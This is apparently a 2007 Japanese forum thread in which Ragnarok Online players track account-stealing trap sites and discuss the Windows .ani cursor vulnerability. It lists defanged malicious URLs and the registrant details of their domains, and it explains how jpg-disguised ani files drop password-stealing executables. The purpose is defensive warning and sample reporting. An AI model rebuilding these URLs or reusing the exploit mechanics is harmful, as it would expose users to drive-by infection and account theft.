それはブログの見出しをパクってどこかに書き込んだものだね。

このフレーズを検索したらオリジナルが出た。
”神器材料買取してます、何かあればお声をおかけください。 blog”

オリジナルはライブドアブログだよ。

346 ：(^ー^*)ノ〜さん sage ： 2007/04/02(月) 17:36 ID:idxAQEm00

”.”→”■”の全置換しようよ

347 ：(^ー^*)ノ〜さん sage ： 2007/04/02(月) 17:43 ID:8JdisCQX0

>>341
トップレベルドメインまでリンクが入ってないから、開いても”たぶん”大丈夫だろうけど
できれば ドット は全て■に置換してから書き込みお願いします。

348 ：(^ー^*)ノ〜さん sage ： 2007/04/02(月) 17:57 ID:2FkrIicP0

>>341
/2jp/a21.exe NSPack圧縮のMaran。

349 ：(^ー^*)ノ〜さん sage ： 2007/04/02(月) 18:13 ID:2FkrIicP0

ani設置 rormb■com
rarbrc=rormb=linrmb。リネ・ROアカハックではやっぱこいつが最凶。
拡張子がjpgなaniアイコンが2匹、いずれも同じexeをドロップするダウンローダ。
なおaniだけ拾おうとしてもちょっと手間がかかる
(EncodeされたVBScriptでアニメーションカーソルCSS入りのHTMLを書く)。
その辺いじってる内に踏みかねないので、回線切るか仮想環境を推奨。
検体を拾った後のエクスプローラでの取り扱いに注意(aniに変名すると即実行される)。

350 ：(^ー^*)ノ〜さん sage ： 2007/04/02(月) 18:29 ID:Tae9lU/80

ああ、なるほど挙動が大体わかった。
ani拡張子のファイルは中身確認せずにオープンしようとするのか。
exeをjpgなりの拡張子にしてバイナリとして落としてaniにリネームして開けば即実行ってことか。
CSS系もやばそうな気がする。

351 ：(^ー^*)ノ〜さん sage ： 2007/04/02(月) 18:50 ID:4r2x25e60

>MS、Windows脆弱性のパッチを3日にリリース
>ttp://www.itmedia.co.jp/enterprise/articles/0704/02/news035.html

日本語版Windowsに対応するのかどうか不明だが、このパッチを当てるまでは要注意。
既知の危険サイトにしか置かれてないならhostsなりPG2なりで防げるが、未知の罠サイトだと
遣られかねない。

eEyeから非公式パッチも出てるが、そっちを当てていいものか悩む。

352 ：(^ー^*)ノ〜さん sage ： 2007/04/02(月) 18:56 ID:2FkrIicP0

回線抜きまくりでID変わってるけど >>343 = >>349 です。
rormbは持ちドメインが少ないけど、lovetwの奴が使い出したら厄介だなぁ。
Firefoxで拾う→回線抜く→aniにする→圧縮する→ani削除→回線繋ぐ→検体送付
…やってられんわ。早くパッチ出てくれ…。

353 ：(^ー^*)ノ〜さん sage ： 2007/04/02(月) 19:23 ID:2FkrIicP0

>>325 の www■ro-bot■net/10657/ が
aniを使うスクリプトに差し替わってる
(ヘッダを信用するなら今朝8時20分頃?)。
aniがダウンロードするのはyan.exeだけど。

スクリプトはこいつ。平文なのでメモ帳でどうぞ。
www■ro-bot■net/10657/muxiao■js
CSSでカーソルを指定しているのがわかると思う。
パッチは明後日か…。まさに0-dayだなぁ。

354 ：(^ー^*)ノ〜さん sage ： 2007/04/02(月) 20:45 ID:GiAX1jBG0

ソースチェッカーのキャッシュを削除して調べたけど、
>>325のは完全に差し替わってるね。

ttp://www■aaa-livedoor■net/ro-navi/（罠サイト入口）
ttp://www■ro-bot■net/ro-navi/muxiao■js（JavaScript）
ttp://www■ro-bot■net/ro-navi/muxiao1■jpg（ＡＮＩ？）
ttp://www■ro-bot■net/ro-navi/muxiao2■jpg（ＡＮＩ？）

ttp://www■ro-bot■net/10657/（罠サイト入口）
ttp://www■ro-bot■net/10657/muxiao■js（JavaScript）
ttp://www■ro-bot■net/10657/muxiao1■jpg（ＡＮＩ？）
ttp://www■ro-bot■net/10657/muxiao2■jpg（ＡＮＩ？）

ttp://www■gemnnammobbs■com（罠サイト入口）
ttp://www■jprmthome■com/muxiao■js（JavaScript）
ttp://www■jprmthome■com/muxiao1■jpg（ＡＮＩ？）
ttp://www■jprmthome■com/muxiao2■jpg（ＡＮＩ？）

パッチが出るまではIEの使用は控えた方が良さそうですね。

355 ：(^ー^*)ノ〜さん sage ： 2007/04/02(月) 20:55 ID:/sF2VlwG0

リネージュ資料室によるとこのドメインも現れたらしい
www■1gangmu■com
IPは219■232■224■87

www■1gangmu■com/sysexe/にsysffと言う実行ファイルがある。

VirusTotalでの結果、この時点でこれまたカスペで検知されない。
ttp://www.virustotal.com/vt/en/resultadof?bc59ef99e114f7198fa348c3cb144892

キングには検体を出した。

ドメイン登録情報、それによると黒龍江省ハルピン市と出る
Registrant:
gangmutangyaoju
haerbin 150001
china
Phone: 0451-89026868 Fax:
Domain name: 1GANGMU.COM

356 ：(^ー^*)ノ〜さん sage ： 2007/04/02(月) 21:07 ID:2FkrIicP0

FF用っぽいね。

357 ：(^ー^*)ノ〜さん sage ： 2007/04/02(月) 21:42 ID:2FkrIicP0

>>354
CSS切ればいいんじゃねと思ったけど、faviconでも踏む模様。
だめだこりゃ。

358 ：(^ー^*)ノ〜さん sage ： 2007/04/02(月) 22:27 ID:Ps9OYMgx0

ちょっと聞きたいんだけど、自分のパソコンノートン入れてるんだけど、
よく勝手にスキャンが始まって、ウィルスを検知するんだ。
ちなみに↓が今日検知した内容。
「Cookie:プヂ@valueclick.ne.jp」
んで、説明に
「コンピュータの情報を第三者に送る可能性のあるファイルです」
リスクLvは低。
こんなんが何回か出てるんだ。
ちなみに今まで被害は全くない・・・。
垢ハクとは関係ないのかもしれんが・・・。
何だろう・・・。

359 ：(^ー^*)ノ〜さん sage ： 2007/04/02(月) 22:35 ID:PJka4GzR0

それはトラッキングCookieと呼ばれる物でアカハックとは関係ないし、
セキュリティ上の危険も大きくはない。

製品Q&A(ウイルスバスター2007)
ttp://esupport.trendmicro.co.jp/supportjp/viewxml.do?ContentID=JP-2060185&id=JP-2060185
やさしいセキュリティ講座(8) トラッキングCookie
ttp://eazyfox.homelinux.org/Security/Beginner/beginner08.html

360 ：(^ー^*)ノ〜さん sage ： 2007/04/02(月) 22:35 ID:p7MV+qRG0

>>358
トラッキングクッキーで検索するんだ

361 ：(^ー^*)ノ〜さん sage ： 2007/04/02(月) 22:36 ID:p7MV+qRG0

やっぱりかぶったヽ（´ー｀）ノ

362 ：(^ー^*)ノ〜さん sage ： 2007/04/02(月) 22:38 ID:Ps9OYMgx0

おお、こんなに早くレスがつくとは・・・。
>>359>>360ありがとう。
なるほど、垢ハクと関係ないんだ。
なら安心しました。
ちょっとくぐって調べてみる。

363 ：(^ー^*)ノ〜さん sage ： 2007/04/02(月) 23:01 ID:2FkrIicP0

ani補足。eEyeの非公式パッチを回避する攻撃手法が既に公開されています。
やっぱ公式パッチが出るまでだめだわ。

364 ：(^ー^*)ノ〜さん sage ： 2007/04/03(火) 00:58 ID:nwWdgxmI0

>>362
君は、Cookie がどういうものかから、勉強することを勧める。

365 ：(^ー^*)ノ〜さん sage ： 2007/04/03(火) 02:25 ID:5Rtg1Z+i0

>>351
>2007 年 4 月の事前通知 (定例外)
>2007 年 4 月 4 日、マイクロソフトは以下のリリースを予定しています。
>ttp://www.microsoft.com/japan/technet/security/bulletin/advance.mspx
ということで定例外の事前通知がでてます。
ITmediaの記事には3日（米国時間）にパッチリリース予定とありますので
多分同じものではないかと思われます。

366 ：(^ー^*)ノ〜さん sage ： 2007/04/03(火) 02:44 ID:d2IOQAtH0

>>349に仕込まれてる拡張子がjpgなaniファイルについてvirustotalでチェックしてみた
ttp://rormb■com/skto/z1■jpg
ttp://rormb■com/skto/z2■jpg
↓
ttp://www.virustotal.com/vt/en/resultadox?6eb11cbee3b2e9c7a648caf8b23adf7f
ttp://www.virustotal.com/vt/en/resultadox?dcf9a612469c584446c9a98289e85569

>>354は数が多かったので、とりあえず２つだけ調べてみた
ttp://www■ro-bot■net/ro-navi/muxiao1■jpg
ttp://www■ro-bot■net/ro-navi/muxiao2■jpg
↓
ttp://www.virustotal.com/vt/en/resultadox?1816663858ec0556ed067d350cd2f4c7
ttp://www.virustotal.com/vt/en/resultadox?8b1403aab6d608c317a5ee41a19fb362

いずれのファイルも同じような結果で、検出率は比較的良好と思われる。

367 ：(^ー^*)ノ〜さん sage ： 2007/04/03(火) 11:26 ID:hhkLxrZl0

jpg偽装はあっちでも話題だ、4月1日の記事でリストが纏められている

http://hi■baidu■com/daishuo

上が偽装、下が実行ファイル一覧の形。
結構な数がある、ファイル名から見てアカハックものも散見。
リネージュ資料室記載のものもあるがこれだけあるなら未記載も多いと思う。
tt■exeは間違いなくリネやRO向けアカハックウィルスだろう。

368 ：(^ー^*)ノ〜さん sage ： 2007/04/03(火) 11:36 ID:ju8Emfr90

垢ハクとよばれるURLを踏んでしまいました。
どうすればいいでしょうか。
t■p://www■ahatena■com/388465/

369 ：(^ー^*)ノ〜さん sage ： 2007/04/03(火) 11:42 ID:hhkLxrZl0

>>368
ただ単に踏んでしまいましたでは答えようがないけれど、簡潔に言うなら。

オンラインスキャンしましょう、詳しくは検索してね。
アンチウィルスソフト買って対策しましょう。
OSの再インストールしましょう。

こんなところ？

370 ：(^ー^*)ノ〜さん sage ： 2007/04/03(火) 11:43 ID:cCYjNY7w0

>>368
まずは絶対にROにログインしないこと
アトラクションセンターもダメ

ログインしなければどうということはないので
カスペルスキーオンラインスキャンでチェック
んでOSの再インスコ


もう少し詳しいことを聞きたいならあとはこっちで

セキュリティ対策、質問・雑談スレ
http://enif.mmobbs.com/test/read.cgi/livero/1173878067/

371 ：(^ー^*)ノ〜さん sage ： 2007/04/03(火) 12:44 ID:1uVjtE9C0

光臨の私のblogを歓迎する　ホスト：121■0■133■90
http://www■cityhokkai■com■link

訳わからないコメントだったのでソースチェッカー噛ませたら危険サイトだった。
韓国からのアクセスのよう

372 ：(^ー^*)ノ〜さん sage ： 2007/04/03(火) 13:09 ID:MAMRpWxY0

http://www5f.biglobe.ne.jp/~serdica/ro/bgm.html

373 ：(^ー^*)ノ〜さん sage ： 2007/04/03(火) 13:18 ID:r8T6+LJO0

何がしたいのかわからんが置き換えなしURLとかこのスレでは誰も踏まないぞ？
Roのサウンドが移転どーこーらしいけども

374 ：(^ー^*)ノ〜さん sage ： 2007/04/03(火) 13:20 ID:ZoiNZYCo0

BGM変更スレの1にも入ってるサイトだな。

375 ：(^ー^*)ノ〜さん sage ： 2007/04/03(火) 13:25 ID:ZoiNZYCo0

良く見たらそのBGM変更スレでテンプレにあるアドレス張ってた。
他にmonazillaスレにも居たがこっちは分からないアドレス。何がしたいのだろう。

376 ：(^ー^*)ノ〜さん sage ： 2007/04/03(火) 14:01 ID:3zWFVXio0

AssassinTemplateに頻繁に垢ハックURLが書き込まれています。
新型のURLなら防げないこともあるやもしれませんが、
周知されて1ヶ月も経つようなURLが未だに書き込み可能というのは正直驚きです。

ROサイト管理者連絡会MLの方からアサシンWiki管理人さんへ助言頂けないでしょうか。

377 ：(^ー^*)ノ〜さん sage ： 2007/04/03(火) 14:15 ID:pI49ZCik0

● 怪しいアドレス？を踏んだ時用

【　　アドレス 　 】p://www■ahatena■com/388465/
【気付いた日時】 4月3日
【　 　　 OS　 　 】WindowsXP Professional
【使用ブラウザ 】 Slepnir
【WindowsUpdateの有無】 一番最後がいつか覚えていない。
【　アンチウイルスソフト 】特に無し
【その他のSecurty対策 】特に無し
【 ウイルススキャン結果】 何もしてません
【スレログやテンプレを読んだか】Yes
【説明】

上記アドレスを某BBSのカキコで踏んだ後。ブラウザの下の枠みたいなところには「ページ表示完了」
と出てたけど、何も表示されていなかったので、そのページを閉じました。そしてその直後に発見！
そのカキコの下のカキコに「このURLは有名な垢ハクだから踏まないように」と記載されていました。

これはやばい！と思い、とりあえずLANケーブルをぬきました。でもそれだと、このにゅ缶で相談できないなぁ
と思って、LANケーブルをさして、さくさくっとカキコして、またLANケーブルを抜きました。
なお、上記出来事は、ばあちゃんの家でのデスクトップPCでの出来事です。
ばあちゃんの家にはもちろんROプレイヤーはいません。そもそもネットつかってるのか、という状況です。
というかPCもほこりかぶりまくりです。

その後自宅に場所移動して、（約2時間後）、自分のPCで、とりあえず、『GungHo-IDパスワード』
『アトラクションIDパスワード』『メールアドレス』を変更しました。あとなんとなくMSNメッセンジャーのパスワードも
変えました。

『キャラパスワード』は今メンテ中なのでしてませんし、なんとなく嫌な予感がしたので、そもそもROにログインしてません。

また、やばい！と思ってから、ばあちゃんちのPCからはガンホアトラクションセンター、ROのログインはしてません。
そのような状況です。とりあえず今からばあちゃんちに戻ってOS最インストールしてきます。

そんな状況です。大丈夫でしょうか。なにか落ち度はありますでしょうか。

378 ：(^ー^*)ノ〜さん sage ： 2007/04/03(火) 14:23 ID:+Mq93YIt0

ログインしてないなら大丈夫だし、HDDフォーマットしてOS入れなおすならバッチリ。
あとは何より踏まないようにする事かな。
ばあちゃんちの起動した時に、アップデートやウィルスチェックもしてあげるといいかもね。

379 ：(^ー^*)ノ〜さん sage ： 2007/04/03(火) 14:44 ID:PNjQvPp30

>>357,363
まじか。セキュリティパッチ入るまで他所のアドレス踏むのやめとこう。
ani拡張子で蹴ってもリネームするんだろからきついなあ。

380 ：(^ー^*)ノ〜さん sage ： 2007/04/03(火) 16:53 ID:6EBf0mBo0

今日管理人さんによって削除されてますが、Eir板にてこんな新スレを作られてました。
対象のURLはまとめサイトにも記載されてますが念のため報告。

メンバー若干名.友好ギルド募集

【ギルド名】love&peace☆
【現Ｍ数/平均lv】３１名/lv７０
【Ｇ構想】マッタリでも賑やかなＧを
【ＧＶＧ】非参加
【定例狩り】毎週金曜日２２時〜
【ＩＮ率】毎日平均１０名程で２１時〜深夜にかけて上がります
【特徴】マッタリ風味。会話と狩りが盛んです
【溜り場】プロンテラ内
【多い職業】支援職(転生５名、転生前５名＞Lv７０〜９０)

◆ＧＭ募集
【募集数】１〜３名
【条件】Ｌｖ職業不問ですがＩＮ率は夜中接続以上
【加入後】２週間程は体験メンバーとなり以降正規メンバーへ

◆友好ギルド募集
毎週金曜日一緒に合同狩りしませんか的なコンセプトです
毎週でなくても可。新設Ｇ歓迎☆
【条件】溜り場がプロンテラ内かその周辺でＧv非参加ギルド
ttp://www■fcty-net■com

381 ：(^ー^*)ノ〜さん sage ： 2007/04/03(火) 18:15 ID:o9zBrvWn0

新規のアカハクドメインと思われる物を捕獲。
http://www■aurasoul-visjp■com/bbs/

DomainToolsの解析
http://whois.domaintools.com/aurasoul-visjp.com
によると

Created: 28-mar-2007

Registrant ID ................... hc081827964-cn
Registrant Name ................. zhiqiang lin
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian longyan
Registrant City ................. longyan
Registrant Province/State ....... fujian
Registrant Postal Code .......... 610000
Registrant Country Code ......... CN


いつもの奴でしょう。

382 ：(^ー^*)ノ〜さん sage ： 2007/04/03(火) 20:09 ID:MFmYe4WQ0

また嫌な書き込み方が･･･
------------------------------------------
751 ：神田川龍伯 ：2007/04/03(火) 16:27:51
ご無沙汰しております
なんだか最近ＲＯは不安定なことが続きますが
愛しのムナックを見捨てることはできません!!

と、豪語しながら〜
このたびサイトを移転しましたので
お手数ですが、下記のＵＲＬへの
書き換えをお願いいたします。

http://www■blog-livedoor■net/game/

ＲＯ関連のページは現在更新しておりませんが
近いうちに復活させる予定ですぅ。
-----------------------------------------
ほんとそろそろ身内にウッカリ踏む人が出てきそうだ。

383 ：(^ー^*)ノ〜さん sage ： 2007/04/03(火) 20:48 ID:+Mq93YIt0

セキュリティ弱めの身内にはRO系のスレ、Wiki、BBS、Mixi・ブログのコメントのリンクは一切踏むなと伝えてある。
Wikiは全職チェックしたミラー作ってそっち回覧してもらっている。
そこまでしないといけないような状況になっていて辛い所･･･
ただ、全く関係ないWikiやスレにも張られている事がある事もきっちり伝えておこう。

384 ：(^ー^*)ノ〜さん sage ： 2007/04/03(火) 22:13 ID:wc7CDbd90

すげーいいやつだな。
身内とはいえ人のためによくもまぁそこまで・・

385 ：(^ー^*)ノ〜さん sage ： 2007/04/03(火) 23:03 ID:tLbnHIbW0

そのミラーURLをうｐ！
と思ったけどいらん面倒や転送量の問題もありそうだしやめといたほうがいいか

386 ：(^ー^*)ノ〜さん ： 2007/04/03(火) 23:04 ID:eO9JQUN00

【　　アドレス 　 】http://www■geocities■jp/tadabots/
【気付いた日時】 4月3日
【　 　　 OS　 　 】WindowsXP
【使用ブラウザ 】 firefox
【　アンチウイルスソフト 】特に無し
【その他のSecurty対策 】特に無し
【 ウイルススキャン結果】 何もしてません
【スレログやテンプレを読んだか】Yes
【説明】
某所に張られてたんだけど、これはサイトにアクセスした時点でアウト？
サイト内には不正ツール（らしきもの）が多数うｐられてるけど、それを落としたらアウト？
どうなの？

因みに俺はアドレスを踏んでしまっただけでツールには触ってません。

387 ：(^ー^*)ノ〜さん sage ： 2007/04/03(火) 23:06 ID:IAc8r55v0

ﾐｼﾞﾝｺは帰れ

388 ：(^ー^*)ノ〜さん sage ： 2007/04/03(火) 23:21 ID:ZtZani070

>>386
怪しげな所に自ら行く人は、全て自己責任でお願いします。
アングラというのは本来そういう物なのですから。

389 ：(^ー^*)ノ〜さん sage ： 2007/04/03(火) 23:26 ID:eO9JQUN00

何か勘違いされてるようですが、俺はbot目当てとかそういう下心があってアクセスした訳ではありません。
（つまりbot関連のスレやサイトからアクセスしたのではないのです）

張られていたのが某GMSでメンバーのホームページだと偽装されてたんです。
よく確かめなかった俺も俺ですが。

390 ：(^ー^*)ノ〜さん sage ： 2007/04/03(火) 23:53 ID:o9zBrvWn0

怪しいモノは踏まない触らない。

その辺の事情は置いといて、先ずはこの辺からどうにかしる。
> 【　アンチウイルスソフト 】特に無し
> 【その他のSecurty対策 】特に無し
> 【 ウイルススキャン結果】 何もしてません

> 【スレログやテンプレを読んだか】Yes
読んだんなら大抵の想像はつくと思うんだがな。

391 ：(^ー^*)ノ〜さん sage ： 2007/04/03(火) 23:59 ID:rvQCk9SR0

>>386
ここはお前のウィルススキャンの手間を省くためのスレじゃない。

>>390
読むことと理解することは全く別の問題って事だな。

392 ：(^ー^*)ノ〜さん sage ： 2007/04/04(水) 00:00 ID:mJpeQRdn0

対策まったくしてない馬鹿が踏もうが関係ないだろう
真面目に相談してるわけじゃないんだしスルーするだ

393 ：(^ー^*)ノ〜さん sage ： 2007/04/04(水) 00:07 ID:WwjnKoTc0

まぁ困って質問しに来てるのを無碍にするのもあれだけど
これだけユーザー間で騒がれてることで対策0ってのも問題だよ
自分で「しまった」って思ったのならまずテンプレ読んで理解しておいで
じゃないときついこと言われても言い返せないよ

394 ：(^ー^*)ノ〜さん sage ： 2007/04/04(水) 01:42 ID:98JQAP/W0

おまいら。
こういうときはとりあえず脅かしておくもんだぞ。

>>386
対策なしのまま放置している時点でアウトの可能性も高い。
今のままログインしたりすると垢ハックの恐れがある。
ツールに触るかどうかは関係なく、
アドレス踏んだだけで感染するからこれだけ騒がれている。

誰が悪いとか、偽装だからとかは言い訳にならない。困るのはあなた。
リスクを避けたいならOS再インストール頑張れ。

395 ：(^ー^*)ノ〜さん sage ： 2007/04/04(水) 01:45 ID:/WugtN0u0

今後も「www■？？？？？■netは垢ハックURLです」という話は続くと思うのだけども、
一元的な解決方法として、テキトーに考えてみた

○認証式の公開HTTP Proxyを立てる。
　・利用者は配布されたID/Passを使ってHTTP Proxyにアクセス
　・クライアントIPを、日本のIPに絞る。
　・中国/韓国へのアクセスを原則禁止にする(一部例外あり)
　・垢ハックURLが発表されたらブラックリストに追加。

http://www.rbl.jp/index-j.php(RBL.JPプロジェクト　RBLでぐぐってもOK)
のようなものかのぅ。
メリット/デメリットとしては

○メリット
　・ブラックリスト(FQDNとIPアドレス両方)を一元管理できる。
　・ユーザーがhostsファイルをいじる必要なし。
　・(管理人の頑張り次第で)他MMOユーザーにも使ってもらえる。

○デメリット
　・Proxy鯖管理が面倒(管理者が負う責任が大きい)
　・接続記録がProxy鯖管理人に丸見えだけど、それでいいのかい？
　・Proxy鯖管理人が悪意もったら逆効果になる。
　・ID/Passをどうやって管理するんかい？
　・定期的なブラックリストの更新が面倒

ざっくばらんに考えてみたが・・・・
デメリットでかいね。

まぁ、各個別対応だけでは対処し難い気がするから、
一元的な解決方法もあったら便利だとは思うな。

396 ：(^ー^*)ノ〜さん sage ： 2007/04/04(水) 02:59 ID:sWauj3et0

いつも巡回しているサイトに変なのがありました
(現在は怪しい箇所は修正されています)
381と同一URLですが書き込みされた内容を掲載します

-----
現在、aurasoul社のウイルス情報サイトにてラグナロクオンラインを狙った
ウイルスの発生と警告の報告がされています。

ウイルス名 ： Trojan.Kakkeys.B(シマンテック社でのウイルス名)
種別 ： トロイの木馬

Trojan.Kakkeys.B
発見日 2005年06月30日 (米国時間)
最終更新日 2007年04月03日 (米国時間)

Trojan.Kakkeys.B は、特定の掲示板やWinny ファイル共有ネットワークを介して、
機密情報（ラグナロクオンラインのキャラクター名など）を漏洩しようとする
トロイの木馬型ウィルスです。
ウイルス対策ソフトをご使用されている方は、パターンファイルの更新を行った後、
必ずご自身が利用しているパソコンのウイルスチェックを行っていただけますよう
お願いいたします。

なお、このウイルスに関する対策法などの詳しい情報は、下記aurasoul社のサイトなど
お客様がご利用されているウイルスソフトベンダー様のサイトにて
ご確認をお願いいたします。
http://www■aurasoul-visjp■com/bbs/

ラグナロクオンライン運営チーム
-----
aurasoul-visjp■comをソースチェッカーオンラインで調べると
IP:222.77.185.88(Chinanet Fujian Province Network)/China

397 ：(^ー^*)ノ〜さん ： 2007/04/04(水) 03:37 ID:gM97i8760

もうなんか…だめぽ。気をつけてるけどいつ引っかかってもおかしくないと思ってる俺が警告age

398 ：(^ー^*)ノ〜さん sage ： 2007/04/04(水) 04:05 ID:hs+9FggC0

>>396
うわ、ここまで巧妙になりましたか
ここまで来ると危険ドメインを知っている人じゃないとほんとに踏んでしまいそう
かなりやばい状況

「ラグナロクオンライン運営チーム」の名前を使っていることで癌に動いて
もらえないのだろうか・・・期待できないけど・・・

>>367のリストからリネージュ資料室さんにも大量の危険サイト・危険ドメインが
追加されていますね。リネージュ資料室の管理にさんもここ見てるのかな

399 ：(^ー^*)ノ〜さん sage ： 2007/04/04(水) 04:34 ID:rzRo7x2X0

.ani関連、クリティカルなのでこちらにも掲載。
KB925902
http://support.microsoft.com/kb/925902
MS07-017
http://www.microsoft.com/technet/security/bulletin/ms07-017.mspx
Windows Updateサイト(or WSUS)から速やかにアップデートする事を推奨。

400 ：(^ー^*)ノ〜さん sage ： 2007/04/04(水) 04:52 ID:pUOIGVnk0

日本語も来てた。
http://www.microsoft.com/japan/technet/security/bulletin/ms07-017.mspx
2000・XP・2003・Vista

401 ：(^ー^*)ノ〜さん sage ： 2007/04/04(水) 07:53 ID:upFlsL4c0

検体を収集して送る人向けの情報。
ani(あるいは偽装のjpg、gif、etc.)はエディタ
(バイナリエディタ推奨、無ければメモ帳でも可)で開くと
ファイルの末尾にexeのURIが書いてあります。
ちなみにaniはぶっちゃけ複数のicoをRIFFで固めたものなので先頭はRIFF。

402 ：(^ー^*)ノ〜さん sage ： 2007/04/04(水) 08:15 ID:X9Ip1c8a0

>>398
名前を騙るのなんてウイルス拡散の常套手段だぞ

垢ハックじゃないけど、MSとかウイルス対策ベンダーを騙る手口は過去に何度もあったし

403 ：(^ー^*)ノ〜さん sage ： 2007/04/04(水) 09:07 ID:Qc4cwfsl0

396のドメイン名はどうも掲示板のパクリらしい
またしてもなんちゃって掲示板のようだね。

元(メビウスリング掲示板)
http://aurasoul■vis■ne■jp/

連中の罠ドメインは"＊jp.com"が多いな。
掲示板持ちで関連の禁止語句書ききれなくなったらこれで纏めてもいいかと思う。
知人友人がそうしたドメインをとっていなければだけどね。

404 ：(^ー^*)ノ〜さん sage ： 2007/04/04(水) 10:24 ID:GTCmkqeu0

>>396 の本文だけ借りてヘルプデスクにこういうのもあるんだから公式サイトに注意喚起しろって投稿しといた。
まじでなんとかしてほしい。

405 ：(^ー^*)ノ〜さん sage ： 2007/04/04(水) 10:40 ID:/1eOCxE50

mixi日記のコメントですけど、うちにも貼られてました。
コメント内容はまったく脈絡のないホラーうんぬんだったので
踏んだ人はいないと思われます。
一応貼ったユーザーはmixi側に通報しておきました。

http://urpoka■blog75■fc2■com/

406 ：(^ー^*)ノ〜さん sage ： 2007/04/04(水) 11:00 ID:Qc4cwfsl0

>>405
またFC2か、ダメだな。
ラブ台湾(lovetw)がソース末尾に書き込まれてる。

ブログ内容は空っぽだった。
罠誘導専用ブログ確定。

407 ：(^ー^*)ノ〜さん sage ： 2007/04/04(水) 11:24 ID:iZVr54Gq0

http://nikang■blog79■fc2■com/

不自然なコメだったので消したが
ソースチェッカーにかけたら黒。

中身はOdinの人のBlogのコピー

408 ：(^ー^*)ノ〜さん sage ： 2007/04/04(水) 13:04 ID:5JR1KGpH0

ヤフーでOWNて検索して
http://www■own■jp
のアドレスをクリックしたら画面真っ白なページが表示されました。
これって垢ハックアドレスでしょうか・・？

409 ：(^ー^*)ノ〜さん sage ： 2007/04/04(水) 13:19 ID:otzENJpZ0

>>408
OWN RAGNAROKは2月に閉鎖しました。
現在は別ページにクエストまとめ＋閉鎖の際の告知だけ残っています。
ttp://www8.plala.or.jp/ragnarok/

で、そのページは真っ白なだけで無害です。

410 ：(^ー^*)ノ〜さん sage ： 2007/04/04(水) 13:21 ID:WvchBpn70

そこは唯のブランクページ。

一応言っておくとOWNは現在閉鎖して存在していない。

アドレスはミラーと併せて２つあったが、閉鎖前にそっちのアドレスは使われなくなった。
そしてその後閉鎖した。
垢ハクが激しい時期に閉鎖したため、後にOWNのドメインを中華その他に悪用されたら困ると
いう意見が多く出た。
そのためドメインはOWNの管理人が暫くは保持してくれる事になって、現在に至る。

411 ：408 sage ： 2007/04/04(水) 13:24 ID:5JR1KGpH0

閉鎖されてたのですか。知らなかった・・・
今垢ハックはやってるので警戒しすぎてしまいました。

ご親切にありがとうございます

412 ：(^ー^*)ノ〜さん sage ： 2007/04/04(水) 14:04 ID:d17V6AEn0

あれだ危険ドメインを晒すサイトとかってないかね？

413 ：(^ー^*)ノ〜さん sage ： 2007/04/04(水) 14:21 ID:upFlsL4c0

テンプレ読めばいいと思うよ。

414 ：(^ー^*)ノ〜さん sage ： 2007/04/04(水) 15:36 ID:d17V6AEn0

そんなテンプレあるんだ・・・

415 ：(^ー^*)ノ〜さん sage ： 2007/04/04(水) 15:39 ID:TjO67E570

>>414
おまいさんの目はフシアナか

416 ：(^ー^*)ノ〜さん sage ： 2007/04/04(水) 15:41 ID:ZpffGppv0

>>414
要は>>1-2を読めってこと

417 ：(^ー^*)ノ〜さん sage ： 2007/04/04(水) 15:49 ID:WvchBpn70

意図がよく判らん。
危険ドメインの一覧を見たいのか、危険ドメインを見つけたから晒したいのか。

前者なら>1-2、後者ならこのスレかセキュスレ。

418 ：(^ー^*)ノ〜さん sage ： 2007/04/04(水) 18:08 ID:PG1rT9AH0

弓手スレより転載

855 ：弓手Wikiかんり ◆Ymlphaz5wQ ：07/04/04 13:56 ID:cAVvM/z/0
アカウントハッキング(アカハック)について

一向に止む気配のないアカハックですが、弓手Wikiへも
アカハックURLの書き込みが毎日数回程度来ております。

spamフィルタにより今のところblockできているので、
閲覧者の目に触れることはありませんが、敵は次々と
新しいドメインを取得していますし、サーバのクラッ
キングにより旅行会社のWebサイト上に置かれた事例も
あります。
最近では blog???.fc2.comなど本物のblogサイト上に
他所のblogからの画像、文章のコピペで偽blogを作成し
アカハックURLを読み込ませるものすら存在します。

管理者連絡会を設立して管理者間で情報交換するなど、
できるかぎりの対策をしていますが、閲覧者側の環境に
脆弱性があるままでは何をしても決定打にはなりえません。

** 最低でも WindowsUpdateをしてください **
特に本日(4/4)配布のものは、最近発見され、すでに
アカハックURLで利用されている 非常に危険度が高い
脆弱性に対応した更新を含んでいます。

** アンチウィルスソフトを入れパターンを更新してください **
ただし格安ものはアカハック系に弱いことが多いです。

419 ：(^ー^*)ノ〜さん sage ： 2007/04/05(木) 11:51 ID:3FNjrU+X0

>>338
NOD32で検出できなかったので報告した結果。
−−−−−
ご提供していただいた検体(添付ファイル）について、
開発元であるESETから「ファイルは問題ない」との回答を
得ました。

しかしながら、下記サイト
> http://www■kotonohax■com/blog/xzz■exe
に現在置かれているファイルについては
「Win32/PSW.Maranの亜種」として検出することを確認致
しました。

現在は報告時にあったファイルとは別のものが保存され
ているようです。
−−−−−
確かに、報告時の検体は「現時点でも」検知しません。挙動確認の結果問題無かったということは、
その時点では、未完成品を置いてたのかも。
但し、現時点で置いてある同名のファイルは検知されます。（動作するものが置いてあるということ）

同じアドレスで過去に検知しても、差し替えられる可能性がありますね。
やっぱり、こまめに、パターン更新して、報告して、対応してもらうしかないようです。

420 ：(^ー^*)ノ〜さん sage ： 2007/04/05(木) 16:10 ID:KjeQF3U80

↓↓↓本日RMCに書き込まれてたもの↓↓↓

New ひっとん さん 2007/04/05 (木) 14:56 UID：[ 41273@FU0/yO6N ] [ メール ]

神器材料買取してます、何かあればお声をおかけください。
白ポ?青ポ?白スリム?塩酸?火炎瓶は販売の他、材料との交換も行ってます。
販売価格及び交換比率は各自お問い合わせください。
その他応相談　※身内特典あり（詳しくは本人まで）
http://csfir■blog87■fc2■com/
RO歴史の上で最も変態の装備．
　意外にも１つの国民中学校に出て手を生みます！！
　詳しい情況−−
http://bqdr■blog98■fc2■com

↑↑↑本日RMCに書き込まれてたもの↑↑↑

上のは>>341に出てるけど、下のは初めてかな。
IFRAMEで http://www■lovetw■webnow■biz/2jp が仕込まれてます。

ブログの内容だけど、他のブログからテキストや画像を集めてきて、適当に貼り付けただけの模様。
これからも数日に１回のペースでFC2に罠ブログ作り続けるつもりなのかなあ。

421 ：(^ー^*)ノ〜さん sage ： 2007/04/05(木) 20:24 ID:Gd9V6NmE0

最近よく垢ハックアドレスが仕掛けられている職Wikiは3つ。
AssassinTemplate、騎士スレテンプレ、ソウルリンカーwiki
spam.ini.phpを導入して対策を取って欲しいところですが・・・

